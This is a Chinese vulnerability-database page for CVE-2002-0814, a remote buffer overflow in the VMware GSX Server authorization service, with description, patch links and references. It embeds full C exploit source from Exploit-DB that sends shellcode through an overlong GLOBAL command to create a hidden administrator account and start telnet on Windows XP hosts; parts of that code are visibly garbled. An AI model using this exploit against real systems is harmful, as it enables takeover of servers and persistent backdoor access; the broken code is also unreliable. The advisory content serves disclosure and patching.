CVE-2002-0814
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:22:02
NMCOE    

[原文]Buffer overflow in VMware Authorization Service for VMware GSX Server 2.0.0 build-2050 allows remote authenticated users to execute arbitrary code via a long GLOBAL argument.


[CNNVD]VMWare GSX Server验证服务远程缓冲区溢出漏洞(CNNVD-200208-066)

        
        VMware GSX Server是一款非常流行的虚拟PC机软件,其中包含远程访问验证服务。
        VMware GSX Server的验证服务在处理"Global"命令时对参数长度缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        VMware GSX Server在与VMware Remote Console通信是通过VMware Authorization Service监听的902端口与VMware Remote Console进行连接的,在数据通讯之前的需要提交如下操作:
        220 VMware Authentication Daemon Version 1.00
        USER anyuser
        331 Password required for user.
        PASS ******
        230 User user logged in.
        GLOBAL server
        200 Connect Global
        USER、PASS、GLOBAL命令对其参数都已经进行了充分检查,当提交参数的字符串过长时,会被断开连接,并返回类似599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()的消息:
        220 VMware Authentication Daemon Version 1.00
        USER AAAA....(Ax500)
        599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()
        但是GLOBAL命令在使用一个未超过限定长度的字符串做参数时就已经发生了溢出,溢出会导致VMware Authorization Service异常结束,精心构建提交参数可能使攻击者以管理员权限在系统中执行任意指令。
        以上漏洞需要有一个合法的帐户进行利用。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0814
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0814
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-066
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0057.html
(UNKNOWN)  NTBUGTRAQ  20020805 VMware GSX Server 2.0.1 Release and Security Alert
http://marc.info/?l=bugtraq&m=102752511030425&w=2
(UNKNOWN)  BUGTRAQ  20020724 VMware GSX Server Remote Buffer Overflow
http://marc.info/?l=bugtraq&m=102765223418716&w=2
(UNKNOWN)  BUGTRAQ  20020726 Re: VMware GSX Server Remote Buffer Overflow
http://www.iss.net/security_center/static/9663.php
(UNKNOWN)  XF  vmware-gsx-auth-bo(9663)
http://www.securityfocus.com/bid/5294
(UNKNOWN)  BID  5294
http://www.vmware.com/download/gsx_security.html
(UNKNOWN)  CONFIRM  http://www.vmware.com/download/gsx_security.html

- 漏洞信息

VMWare GSX Server验证服务远程缓冲区溢出漏洞
高危 缓冲区溢出
2002-08-12 00:00:00 2005-05-02 00:00:00
远程  
        
        VMware GSX Server是一款非常流行的虚拟PC机软件,其中包含远程访问验证服务。
        VMware GSX Server的验证服务在处理"Global"命令时对参数长度缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        VMware GSX Server在与VMware Remote Console通信是通过VMware Authorization Service监听的902端口与VMware Remote Console进行连接的,在数据通讯之前的需要提交如下操作:
        220 VMware Authentication Daemon Version 1.00
        USER anyuser
        331 Password required for user.
        PASS ******
        230 User user logged in.
        GLOBAL server
        200 Connect Global
        USER、PASS、GLOBAL命令对其参数都已经进行了充分检查,当提交参数的字符串过长时,会被断开连接,并返回类似599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()的消息:
        220 VMware Authentication Daemon Version 1.00
        USER AAAA....(Ax500)
        599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()
        但是GLOBAL命令在使用一个未超过限定长度的字符串做参数时就已经发生了溢出,溢出会导致VMware Authorization Service异常结束,精心构建提交参数可能使攻击者以管理员权限在系统中执行任意指令。
        以上漏洞需要有一个合法的帐户进行利用。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        VMWare
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        VMWare GSX Server 2.0:
        VMWare Patch vmware-authd.zip
        
        http://www.vmware.com/download1/software/support/vmware-authd.zip

- 漏洞信息 (21639)

VMWare GSX Server 2.0 Authentication Server Buffer Overflow Vulnerability (EDBID:21639)
windows remote
2002-07-24 Verified
0 Zag & Glcs
N/A [点击下载]
source: http://www.securityfocus.com/bid/5294/info

VMWare GSX Server ships with an authentication server. The server is vulnerable to a buffer overflow related to handling of the argument to the "GLOBAL" command. While attackers must be authenticated before the command can be issued, default accounts may exist. This has not been confirmed by VMWare.

This condition may be exploited to execute arbitrary code on the GSX server host. The code likely executes on the underlying, native system and may compromise the host entirely (including all virtual systems).

////////////////////////////////////////////////////////////////////
//  VMwareOverflowTest v1.0
//  Written by Zag & Glcs
//  BigBall@venustech.com.cn glcs@venustech.com.cn
//  http://www.Venustech.com
////////////////////////////////////////////////////////////////////

#include "stdio.h"
#include "winsock2.h"
#include "stdlib.h"
#pragma comment (lib, "Ws2_32")

to make sure that the shellcode length and GLOBAL command length not 
exceed the limit.

//add an administrator account: x_adrc password: x_adrc
//start the telnet service
"\x68\xC1\x15\x35\x09\x81\x2C\x24"
"\x80\xD1\xF0\x08\x68\x63\x20\x20"
"\x2F\x68\x5F\x61\x64\x72\x68\x72"
"\x73\x20\x78\x68\x72\x61\x74\x6F"
"\x68\x6E\x69\x73\x74\x68\x61\x64"
"\x6D\x69\x68\x6F\x75\x70\x20\x68"
"\x61\x6C\x67\x72\x68\x20\x6C\x6F"
"\x63\x68\x26\x6E\x65\x74\x68\x74"
"\x73\x76\x72\x68\x20\x74\x6C\x6E"
"\x68\x74\x61\x72\x74\x68\x65\x74"
"\x20\x73\x68\x44\x44\x26\x6E\x68"
"\x63\x20\x2F\x41\x68\x5F\x61\x64"
"\x72\x68\x72\x63\x20\x78\x68\x78"
"\x5F\x61\x64\x68\x73\x65\x72\x20"
"\x68\x65\x74\x20\x75\x68\x2F\x63"
"\x20\x6E\x68\x63\x6D\x64\x20\x8B"
"\xC4\x6A\x01\x50\xB8\xC6\x84\xE6"
"\x77\xFF\xD0\x90";

//the JMP ESP address of WindowsXP English Version, we can add the address 
of other systems, such as Windows 2000.
unsigned char Jmp_ESP_XP_Eng[] = {0x1b,0x17,0xe3,0x77};//WinXP Eng
unsigned char Jmp_ESP[4];

void usage ()
{
	printf ("VMwareOverflowTest v1.0\n Written by Zag & Glcs\n 
Email:BigBall@venustech.com.cn\n Glcs@venustech.com.cn\n 
www.Venustech.com\n\nUsage:VMwareOverflowTest.exe <IP> <PORT> <username> 
<passwd> <os type>\n\t0.Windows XP Eng\n");
	return;
}

int main (int argc, char **argv)
{
	char str[4096];
	WSADATA wsa;
	SOCKET sock;
	struct sockaddr_in server;
	int ret;
	int i = 0;
	if (argc != 6)
	{
		usage ();
		return 0;
	}
	WSAStartup (MAKEWORD (2, 2), &wsa);
	sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
	server.sin_family = AF_INET;
	server.sin_port = htons (atoi (argv[2]));
	server.sin_addr.s_addr = inet_addr (argv[1]);

       //the base address of DLL files on each systems is not the same, so 
we need to modify the call address 
        //we can find that the system have loaded the DLL files we need by 
check VMware Authorization Service
       //then we only need modify the call address
	//(BASE_ADDRESS + FUNCTION_OFFSET)
	switch (atoi(argv[5]))
	{
	case 0:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);

		break;
	default:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);
		break;
	}
	ret = connect (sock, (struct sockaddr *)&server, sizeof (server));

	if (ret == SOCKET_ERROR)
	{
		printf ("connect error\n");
		return -1;
	}

	//receive welcome message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

        //send username confirm message
	memset (str, 0, sizeof (str));
	strcpy (str,"USER ");
	strcat (str, argv[3]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

        //receive confirm message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

	//send password
	memset (str, 0, sizeof (str));
	strcpy (str,"PASS ");
	strcat (str, argv[4]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

	//receive confirm message
	memset (str, 0, sizeof (str));
	ret = recv (sock, str, 100, 0);
	printf ("%s", str);

        make GLOBAL command
	memset (str, 0, sizeof (str));
	strcpy (str, "GLOBAL ");
	//to up the success probability, we use the half-continuous 
covering, so the exact overflow point is not need


	for(i = 7; i < 288; i += 8)
	{
		memcpy(str + i, "\x90\x90\x58\x68", 4);
		//write the JMP ESP command into the possible return 
address
		memcpy(str + i + 4, Jmp_ESP, 4);
	}

	//append the shellcode to the GLOBAL command string
	memcpy (str + i, shellcode, strlen (shellcode));
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);
	printf ("Done!\n");
	closesocket (sock);
	WSACleanup ();
	return 1;
}		

- 漏洞信息

5078
VMware GSX Authorization Service GLOBAL Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-07-24 Unknow
2002-07-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站